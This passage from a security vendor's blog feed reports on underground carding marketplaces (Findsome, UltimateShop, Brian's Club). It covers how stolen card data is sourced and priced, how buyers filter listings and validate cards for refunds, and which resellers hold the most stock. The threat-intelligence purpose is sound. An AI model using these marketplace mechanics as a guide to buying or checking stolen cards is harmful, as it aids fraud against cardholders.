surface web search. When paired with breached credentials circulating in criminal forums, that information fuels business email compromise, spear phishing, impersonation, and even hybrid cyber-physical threats.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Our research features the Rapid7 Exposure Prevention (REP) Score, a quantitative metric that measures executive exposure across four areas: general exposure, social media, public records, and leaked credentials. The data reveals meaningful differences by industry and geography, with U.S.-based executives generally more exposed than their European counterparts, particularly in public records and credential leaks.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>High-profile incidents continue to show how small details can lead to large-scale impact. The takeaway for security leaders is direct: protecting executives requires more than awareness training. It demands continuous monitoring, strong authentication, proactive credential hygiene, and integration between cyber and physical risk programs.</span></p><h2><span style='font-size: undefined;'>Download the Rapid7 report</span></h2><p style="direction: ltr;"><span style='font-size: undefined;'>Download the </span><a href="https://www.rapid7.com/lp/executive-digital-footprints-threat-report/" target="_blank"><span style='font-size: undefined;'>full report</span></a><span style='font-size: undefined;'> to see how your organization compares and how to reduce executive exposure before attackers take advantage.</span></p>]]></description>
      <link>https://www.rapid7.com/blog/post/tr-new-rapid7-report-digital-executive-footprints-exposing-organizations</link>
      <guid isPermaLink="false">blt87ca6bdb2e12234d</guid>
      <category><![CDATA[Research]]></category>
      <category><![CDATA[Labs]]></category><dc:creator><![CDATA[Rapid7]]></dc:creator>
      <pubDate>Tue, 24 Feb 2026 14:00:00 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt6f7e061e63defc56/699c6fb1a8ff500008331a6f/card-threat-report-executives-digital-footprint.jpg" medium="image" />
    </item>
    <item>
      <title><![CDATA[Carding-as-a-Service: The Underground Market of Stolen Cards]]></title>
      <description><![CDATA[<p style="direction: ltr;"><span style='font-size: undefined;'><em>Rapid7 software engineer Eliran Alon also contributed to this post.</em></span></p><h2 style="direction: ltr;">Introduction</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Despite sustained efforts by the global banking and payments industry, credit card fraud continues to affect consumers and organizations on a large scale. Underground “dump shops” play a central role in this activity, selling stolen credit and debit card data to criminals who use it to conduct unauthorized transactions and broader fraud campaigns. Rather than fading under increased scrutiny, this illicit trade has evolved into a structured, service-like economy that mirrors legitimate online marketplaces in both scale and sophistication.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>This evolution has given rise to what can be described as carding-as-a-service (CaaS): a resilient underground market that wraps together stolen payment card data, tools, and support into easily accessible offerings. These stolen credit cards are also often bundled with sensitive personal information, substantially elevating the potential damage to both individuals and organizations, and making the financial loss the least harmful consequence.     </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>While numerous dump shops have been disrupted or shut down over time, several high-profile marketplaces, including Findsome, UltimateShop, and Brian’s Club, continue to shape the market and influence criminal activity. This blog explores these illegal marketplaces and their operations, shedding light on the modern carding economy and highlighting why stronger detection and prevention efforts remain critical.</span></p><h2 style="direction: ltr;">The carding economy at a glance</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Credit card information available on the black market is generally categorized into three types: credit card numbers, dumps, and 'fullz'.</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Credit card numbers </strong></span><span style='font-size: undefined;'>minimally include the data printed on the card: the credit card number itself, cardholder name, expiration date, and the CVV security code. This group may also include the associated billing address and phone number.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Dumps</strong></span><span style='font-size: undefined;'> consist of the raw data from the magnetic stripe tracks. This information is essential for cloning physical credit cards.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Fullz</strong></span><span style='font-size: undefined;'> offers a more complete profile of the cardholder, containing additional personal information such as the date of birth or Social Security Number (SSN).</span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>The exact origin of the information available on the different marketplaces is unclear and is being obfuscated by the admins and resellers; however, further investigation across different cybercrime forums revealed the common methods through which cards get leaked.</span></p><h3><span style='font-size: undefined;'>Phishing</span><span style='font-size: undefined;'><strong> </strong></span></h3><p><span style='font-size: undefined;'>Technological improvements have made </span><a class="embedded-entry redactor-component block-entry" type="entry" target="_self" href="/fundamentals/phishing-attacks" data-sys-entry-uid="bltbefa82259209f3bf" data-sys-entry-locale="en-us" data-sys-content-type-uid="page" sys-style-type="link"><span style='font-size: undefined;'>phishing</span></a><span style='font-size: undefined;'> campaigns much easier to execute. Today, there are phishing-as-a-service (PhaaS) platforms and fraud-as-a-service (FaaS) modules allowing easy setup for new phishing campaigns, along with the infrastructure, page design, and even the collection of credentials or other stolen information (Figure 1). Phishing pages, tricking customers into providing personal financial information (PFI), are still an efficient source for stolen credit information.</span></p><p>⠀</p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt42ebfecb07f1597e/698b8b0768222550dcd78dc8/phishing-page-creation-using-phishing-as-a-service-provider.png" alt="phishing-page-creation-using-phishing-as-a-service-provider.png" caption="Figure 1 - Creation of a phishing page using a phishing-as-a-service provider" height="625" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="phishing-page-creation-using-phishing-as-a-service-provider.png" width="720" max-width="720" max-height="625" style="max-width: 720px; width: 720px; max-height: 625px; height: 625px" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt42ebfecb07f1597e/698b8b0768222550dcd78dc8/phishing-page-creation-using-phishing-as-a-service-provider.png" data-sys-asset-uid="blt42ebfecb07f1597e" data-sys-asset-filename="phishing-page-creation-using-phishing-as-a-service-provider.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 1 - Creation of a phishing page using a phishing-as-a-service provider" data-sys-asset-alt="phishing-page-creation-using-phishing-as-a-service-provider.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 1 - Creation of a phishing page using a phishing-as-a-service provider</figcaption></div></figure><h3><span style='font-size: undefined;'>Physical Devices</span></h3><p><span style='font-size: undefined;'>Physical hacking tools, and other devices that could be attached to different payment devices or ATMs, are used to transmit information into the hands of a malicious actor. Different specialized stores offer to sell such devices and ship them, once again allowing even a novice to start stealing credit information for future use. Threat actors attempt to stay as up-to-date as possible, adjusting themselves to industry trends. These include “Shimming,” which focuses on modern EMV chips, instead of old “Skimming” devices, which require scanning the entire card (Figure 2). The hacking tools target not only ATMs, but also additional devices with daily credit card use, including gas pumps and point-of-sale (POS) machines.</span></p><p>⠀</p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt934ffe9f5b76fe87/698b8b7069953c1889d709b8/carding-as-a-service-skimmers.png" alt="carding-as-a-service-skimmers.png" caption="Figure 2 - A store specializing in selling skimmers and other physical attachments" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="carding-as-a-service-skimmers.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt934ffe9f5b76fe87/698b8b7069953c1889d709b8/carding-as-a-service-skimmers.png" data-sys-asset-uid="blt934ffe9f5b76fe87" data-sys-asset-filename="carding-as-a-service-skimmers.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 2 - A store specializing in selling skimmers and other physical attachments" data-sys-asset-alt="carding-as-a-service-skimmers.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 2 - A store specializing in selling skimmers and other physical attachments</figcaption></div></figure><h3><span style='font-size: undefined;'>Malware</span></h3><p><span style='font-size: undefined;'>Since the large-scale Target breach in 2013, which resulted in the compromise of millions of credit card records, threat actors have steadily evolved point-of-sale (POS) malware variants such as BlackPOS and MajikPOS (Figure 3). In parallel, the widespread adoption of information-stealing </span><a class="embedded-entry redactor-component block-entry" type="entry" target="_self" href="/fundamentals/malware-attacks" data-sys-entry-uid="blt27a56616a1d01483" data-sys-entry-locale="en-us" data-sys-content-type-uid="page" sys-style-type="link"><span style='font-size: undefined;'>malware</span></a><span style='font-size: undefined;'> (“infostealers”) has enabled attackers to harvest credit card data from a broad range of systems, typically alongside additional personally identifiable information (PII) and user credentials.</span></p><p>⠀</p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltb1fb49bc4fd52cfa/698b8becbe56692cb8b691ca/POS-malware-MajikPOS-SaaS-module.png" alt="POS-malware-MajikPOS-SaaS-module.png" caption="Figure 3 - Threat actor offering POS malware (MajikPOS) in SaaS module" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="POS-malware-MajikPOS-SaaS-module.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltb1fb49bc4fd52cfa/698b8becbe56692cb8b691ca/POS-malware-MajikPOS-SaaS-module.png" data-sys-asset-uid="bltb1fb49bc4fd52cfa" data-sys-asset-filename="POS-malware-MajikPOS-SaaS-module.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 3 - Threat actor offering POS malware (MajikPOS) in SaaS module" data-sys-asset-alt="POS-malware-MajikPOS-SaaS-module.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 3 - Threat actor offering POS malware (MajikPOS) in SaaS module</figcaption></div></figure><h3><span style='font-size: undefined;'>Cross-Site Scripting (XSS)</span></h3><p><span style='font-size: undefined;'>Many posts found on different cybercrime forums provide carders with tips about how to exploit web security flaws. In some cases, there are actual examples and guides, including code samples for conducting </span><a class="embedded-entry redactor-component block-entry" type="entry" target="_self" href="/fundamentals/cross-site-scripting" data-sys-entry-uid="blt7f301a2757d423f7" data-sys-entry-locale="en-us" data-sys-content-type-uid="page" sys-style-type="link"><span style='font-size: undefined;'>XSS</span></a><span style='font-size: undefined;'>, i.e., redirecting network traffic into the threat actor’s hands through an injected code (usually JavaScript). Malicious actors inject the “sniffer” in the payment page itself, which later copies the inserted payment information and transfers it to them for future use (Figure 4).</span></p><p>⠀</p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt128380b1caa83984/698b8c8895a14a0a034748f4/carding-as-a-service-coding-sniffers.png" alt="carding-as-a-service-coding-sniffers.png" caption="Figure 4 - A threat actor offering instructions for coding sniffers" height="633" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="carding-as-a-service-coding-sniffers.png" width="952" max-width="952" max-height="633" style="max-width: 952px; width: 952px; max-height: 633px; height: 633px" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt128380b1caa83984/698b8c8895a14a0a034748f4/carding-as-a-service-coding-sniffers.png" data-sys-asset-uid="blt128380b1caa83984" data-sys-asset-filename="carding-as-a-service-coding-sniffers.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 4 - A threat actor offering instructions for coding sniffers" data-sys-asset-alt="carding-as-a-service-coding-sniffers.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 4 - A threat actor offering instructions for coding sniffers</figcaption></div></figure><h2>Key players in the carding underground</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Through ongoing changes within the carding ecosystem and the developments made in fraud detection and prevention, the industry of stolen credit card trading continues to flourish. Banks and credit card companies might be fairly good at monitoring individual transactions, but not at disrupting the broader fraud supply chain. CaaS exploits gaps between payment security, identity security, and organizational visibility, monetizing stolen data upstream before fraud ever reaches issuer models. In addition, fraudsters feed on the ever-lasting weakness of the human factor, acting carelessly with personal information and ignoring security warnings.  </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>These factors, in conjunction with constant market demand, have kept several carding marketplaces, led by Findsome, UltimateShop, and Brian’s Club, in action for a lengthy period. While the design and branding of these marketplaces differ, their core offerings and functionality are largely similar. As a result, their administrators frequently promote their services across dedicated carding marketplaces and broader cybercrime communities.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The main interface of these marketplaces features a streamlined search function that allows users to filter available listings using several parameters, including Bank Identification Number (BIN), country, and “base” - a collection of card records linked to the same issuing bank, card brand (e.g., Visa or Mastercard), and card type, typically compromised within a similar time frame. Filtering options vary slightly between platforms and may include additional criteria such as price range or the availability of supplemental PII, including SSNs.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Search results generally display the card’s expiration date, issuing bank, cardholder name, and approximate geographic location. Each listing also indicates its price and whether it is eligible for a refund. Refund functionality is a critical feature in the carding ecosystem, as it enables buyers to recover funds for cards that later prove invalid. This capability often serves as a differentiating factor between marketplaces, as user complaints on carding marketplaces frequently center on invalid cards, denied refunds, or the resale of outdated card data.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>These carding marketplaces do not disclose the sources of their stolen credit card data and appear to rely primarily on third-party vendors offering previously compromised records. This suggests that they operate as aggregators, reselling data obtained from multiple external suppliers after conducting their own quality assessments. While this model enables platforms to increase both the volume and diversity of their listings, it can also lead to inconsistencies in data quality. Additionally, some resellers appear to offer identical datasets across multiple marketplaces to maximize profits, resulting in overlapping bases between platforms (Figure 5).</span></p><p>⠀</p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltc48beadc1f29ef30/698b8ced2aaa1e9df0f4baa7/UltimateShop-reseller-forum-discussion.png" alt="UltimateShop-reseller-forum-discussion.png" caption="Figure 5 - Forum discussion about an UltimateShop reseller" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="UltimateShop-reseller-forum-discussion.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltc48beadc1f29ef30/698b8ced2aaa1e9df0f4baa7/UltimateShop-reseller-forum-discussion.png" data-sys-asset-uid="bltc48beadc1f29ef30" data-sys-asset-filename="UltimateShop-reseller-forum-discussion.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 5 - Forum discussion about an UltimateShop reseller" data-sys-asset-alt="UltimateShop-reseller-forum-discussion.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 5 - Forum discussion about an UltimateShop reseller</figcaption></div></figure><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>All three marketplaces support Bitcoin payments, while Findsome is currently the only platform that accepts additional cryptocurrencies, including Litecoin and Zcash. Minimum deposit requirements are generally low, ranging from $0 on UltimateShop to $20 on Brian’s Club, likely to reduce barriers to entry and attract new users. In parallel, Findsome and UltimateShop offer deposit bonuses, typically between 5% and 12%, to incentivize larger payments and encourage long-term user engagement.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>These marketplaces are hosted on the dark web, with mirrored versions accessible via the surface web. To mitigate the risk of takedowns or law enforcement action, administrators frequently rotate their surface-web domains. This practice has likely contributed to the proliferation of fraudulent domains impersonating legitimate marketplaces, such as findsome[.]ink and findsomes[.]ru for Findsome, and ultimateshops[.]to for UltimateShop. These sites are designed to leverage brand recognition to deceive users and steal funds. In response, the marketplaces publish lists of their official domains and warn users about potential scams in an effort to maintain trust and protect their reputations.</span></p><h3 style="direction: ltr;"><span style='color:rgb(58, 68, 73);'>Findsome</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Findsome is a deep and dark web carding marketplace that has reportedly been active since 2019. The platform, whose administrators are likely of Russian origin, appears to specialize in the sale of stolen CVV, as well as Fullz. Listings are typically priced between $4 and $25 per record, depending on the perceived “quality” of the data.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Under its “Shop” tab, Findsome enables users to browse and filter available credit card listings of interest (Figure 6). Each listing specifies whether a refund is available should the card prove to be invalid, along with a defined “check time.” The check time refers to a limited window following purchase during which the buyer may attempt to verify the card’s validity and request a refund if necessary.</span></p><p>⠀</p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt2c9d9bec0ca91325/698b8e4d9ebb6c58f68e3b81/findsome-shop-tab.png" alt="findsome-shop-tab.png" caption="Figure 6 - The “Shop” tab on Findsome" height="539" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="findsome-shop-tab.png" width="776" max-width="776" max-height="539" style="max-width: 776px; width: 776px; max-height: 539px; height: 539px" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt2c9d9bec0ca91325/698b8e4d9ebb6c58f68e3b81/findsome-shop-tab.png" data-sys-asset-uid="blt2c9d9bec0ca91325" data-sys-asset-filename="findsome-shop-tab.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 6 - The “Shop” tab on Findsome" data-sys-asset-alt="findsome-shop-tab.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 6 - The “Shop” tab on Findsome</figcaption></div></figure><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>During the designated check-time window, users may attempt to validate the purchased record. The marketplace claims to integrate third-party checker services, such as Luxchecker, which it describes as commonly used across comparable platforms. If the validation process indicates that the card is not valid, a refund is reportedly issued (Figure 7).</span></p><p>⠀</p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt239c0b566ef63803/698b8e999ebb6c62fb8e3b85/findsome-card-validation-outcome.png" alt="findsome-card-validation-outcome.png" caption="Figure 7 - Card validation outcome" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="findsome-card-validation-outcome.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt239c0b566ef63803/698b8e999ebb6c62fb8e3b85/findsome-card-validation-outcome.png" data-sys-asset-uid="blt239c0b566ef63803" data-sys-asset-filename="findsome-card-validation-outcome.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 7 - Card validation outcome" data-sys-asset-alt="findsome-card-validation-outcome.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 7 - Card validation outcome</figcaption></div></figure><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>Actors associated with the marketplace have been observed seeking “resellers” offering large bases on cybercrime forums (Figure 8). Although Findsome does not explicitly disclose information about its resellers, their aliases appear to be embedded in the naming conventions of the databases. For instance, a database titled “NOV 23 _#(KOJO***) GOOD US JP SE” suggests that it was supplied by a reseller operating under the alias “KOJO***.”</span></p><p>⠀</p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blteddd97eb3c4583d9/698b8eea682225562cd78df3/Findsome-post-cardforum-cc.png" alt="Findsome-post-cardforum-cc.png" caption="Figure 8 - Findsome’s post on cardforum.cc" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Findsome-post-cardforum-cc.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blteddd97eb3c4583d9/698b8eea682225562cd78df3/Findsome-post-cardforum-cc.png" data-sys-asset-uid="blteddd97eb3c4583d9" data-sys-asset-filename="Findsome-post-cardforum-cc.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 8 - Findsome’s post on cardforum.cc" data-sys-asset-alt="Findsome-post-cardforum-cc.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 8 - Findsome’s post on cardforum.cc</figcaption></div></figure><p style="direction: ltr;">⠀</p><p><span style='font-size: undefined;'>An analysis of the databases published during the second half of 2025 identified the five most frequent resellers in that period (Table 1). These resellers largely dominated Findsome’s inventory, collectively accounting for more than 50% of its offerings. Overall, 51 resellers were active on the platform during this timeframe, with an average market share of approximately 2% per reseller. This distribution suggests that Findsome relies on a broad network of resellers, likely to diversify its listings and reduce dependence on a small number of dominant suppliers.</span></p><p>⠀</p><table><colgroup data-width='750'><col style="width:28.409090909090907%"/><col style="width:35.79545454545454%"/><col style="width:35.79545454545454%"/></colgroup><tbody><tr><td><p style="text-align: center;direction: ltr;"><strong>Reseller</strong></p></td><td><p style="text-align: center;direction: ltr;"><strong>Records</strong></p></td><td><p style="text-align: center;direction: ltr;"><strong>Share</strong></p></td></tr><tr><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'>tian*****</span></p></td><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'>303,818</span></p></td><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'>13%</span></p></td></tr><tr><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'>vygg*******</span></p></td><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'>266,382</span></p></td><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'>11%</span></p></td></tr><tr><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'>mapk**</span></p></td><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'>231,797</span></p></td><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'>10%</span></p></td></tr><tr><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'>atla****</span></p></td><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'>231,757</span></p></td><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'>10%</span></p></td></tr><tr><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'>find*****</span></p></td><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'>217,846</span></p></td><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'>9%</span></p></td></tr></tbody></table><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><em>Table 1 - Reseller market share</em></span></p><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>Despite its prominence, Findsome appears to face competition from smaller, emerging platforms. While it is sometimes described within cybercrime communities as relatively “reliable,” discussions on underground forums reveal dissatisfaction with its pricing model. Some actors have criticized the marketplace for charging high prices for data that is frequently invalid (Figure 9), while others view the $100 account activation fee for new users as a significant barrier to entry.</span></p><p>⠀</p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltfb6c6850e1678551/698b9051be56692aebb691f7/findsome-mention-carding-forum.png" alt="findsome-mention-carding-forum.png" caption="Figure 9 - Mentions of Findsome on another carding marketplace" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="findsome-mention-carding-forum.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltfb6c6850e1678551/698b9051be56692aebb691f7/findsome-mention-carding-forum.png" data-sys-asset-uid="bltfb6c6850e1678551" data-sys-asset-filename="findsome-mention-carding-forum.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 9 - Mentions of Findsome on another carding marketplace" data-sys-asset-alt="findsome-mention-carding-forum.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 9 - Mentions of Findsome on another carding marketplace</figcaption></div></figure><h3 style="direction: ltr;"><span style='color:rgb(58, 68, 73);'>UltimateShop </span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>UltimateShop is a deep and dark web carding marketplace that has been active since at least 2022. Its administrators appear to be of Russian origin and offer mainly CVV and Fullz. The stolen credit cards are priced between $10 and $30 per record, depending on the assessed “quality” of the data.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Under its “Search CCS” tab, UltimateShop allows users to filter and browse available credit card listings (Figure 10). In addition to standard filters such as BIN and issuing bank, the platform enables users to specify a price range, select individual sellers, and limit results to listings for which validation is available. The results section displays key details about the issuing bank and cardholder, as well as the seller’s name, an assessed validity percentage, and refund eligibility. It should be noted that certain BINs and issuing banks are excluded from validation checks on UltimateShop.</span></p><p>⠀</p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltc955f1739adbcbd5/698b90ac7d2c3122d7ef89e1/Search-CCS-tab-UltimateShop.png" alt="Search-CCS-tab-UltimateShop.png" caption="Figure 10 - The “Search CCS” tab on UltimateShop" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Search-CCS-tab-UltimateShop.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltc955f1739adbcbd5/698b90ac7d2c3122d7ef89e1/Search-CCS-tab-UltimateShop.png" data-sys-asset-uid="bltc955f1739adbcbd5" data-sys-asset-filename="Search-CCS-tab-UltimateShop.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 10 - The “Search CCS” tab on UltimateShop" data-sys-asset-alt="Search-CCS-tab-UltimateShop.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 10 - The “Search CCS” tab on UltimateShop</figcaption></div></figure><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>While purchasing a record, users may initiate a validation check where applicable (Figure 11). UltimateShop does not impose a strict timeframe for this process and does not disclose the checker or validation mechanism used. If the card is deemed invalid (e.g., marked as “Decline”), the user is eligible for a refund.</span></p><p>⠀</p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt045b92a7a1d42cbf/698b912f95a6d978784494c2/UltimateShop-card-validation-outcome.png" alt="UltimateShop-card-validation-outcome.png" caption="Figure 11 - Card validation outcome" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="UltimateShop-card-validation-outcome.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt045b92a7a1d42cbf/698b912f95a6d978784494c2/UltimateShop-card-validation-outcome.png" data-sys-asset-uid="blt045b92a7a1d42cbf" data-sys-asset-filename="UltimateShop-card-validation-outcome.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 11 - Card validation outcome" data-sys-asset-alt="UltimateShop-card-validation-outcome.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 11 - Card validation outcome</figcaption></div></figure><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>UltimateShop’s inventory is largely dominated by a small number of resellers, which collectively accounted for 76% of the platform’s largest offerings during the second half of 2025 (Table 2). SuperUSA appears to be the most prominent seller, contributing approximately 35% of all available records. This concentration indicates a higher reliance on a limited set of resellers and comparatively lower diversification than competing marketplaces such as Findsome. In total, 22 primary resellers were identified on UltimateShop, with an average market share of approximately 5% per reseller.</span></p><p>⠀</p><table><colgroup data-width='750'><col style="width:28.409090909090907%"/><col style="width:35.79545454545454%"/><col style="width:35.79545454545454%"/></colgroup><tbody><tr><td><p style="text-align: center;direction: ltr;"><strong>Reseller</strong></p></td><td><p style="text-align: center;direction: ltr;"><strong>Records</strong></p></td><td><p style="text-align: center;direction: ltr;"><strong>Share</strong></p></td></tr><tr><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'>superusa</span></p></td><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'>293,931</span></p></td><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'>35%</span></p></td></tr><tr><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'>best</span></p></td><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'>116,464</span></p></td><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'>14%</span></p></td></tr><tr><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'>virgin</span></p></td><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'>82,672</span></p></td><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'>10%</span></p></td></tr><tr><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'>sanji</span></p></td><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'>79,110</span></p></td><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'>9%</span></p></td></tr><tr><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'>freshsniffer</span></p></td><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'>62,760</span></p></td><td><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'>8%</span></p></td></tr></tbody></table><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><em>Table 2 - Reseller market share on UltimateShop</em></span></p><p style="direction: ltr;">⠀</p><p><span style='font-size: undefined;'>While UltimateShop remains a well-established platform within the carding ecosystem, its reputation is increasingly being challenged by negative user feedback. Complaints frequently cite high prices and a significant proportion of invalid records, issues that may stem from the platform’s reliance on a small number of potentially unreliable sellers (Figure 12).</span></p><p>⠀</p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt5eee5bace1570c3b/698b919aeb480557dec0b231/UltimateShop-discussion-carding-marketplace.png" alt="UltimateShop-discussion-carding-marketplace.png" caption="Figure 12 - Discussion about UltimateShop on another carding marketplace" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="UltimateShop-discussion-carding-marketplace.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt5eee5bace1570c3b/698b919aeb480557dec0b231/UltimateShop-discussion-carding-marketplace.png" data-sys-asset-uid="blt5eee5bace1570c3b" data-sys-asset-filename="UltimateShop-discussion-carding-marketplace.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 12 - Discussion about UltimateShop on another carding marketplace" data-sys-asset-alt="UltimateShop-discussion-carding-marketplace.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 12 - Discussion about UltimateShop on another carding marketplace</figcaption></div></figure><h3 style="direction: ltr;"><span style='color:rgb(58, 68, 73);'>Brian’s Club</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Active since 2014, Brian’s Club is a well-established player within the carding ecosystem that was originally created to “troll” security researcher and reporter Brian Krebs and his work. Like other marketplaces, it offers a wide range of listings, categorized as “CVV2,” “Dumps,” and “Fullz” (Figure 13). 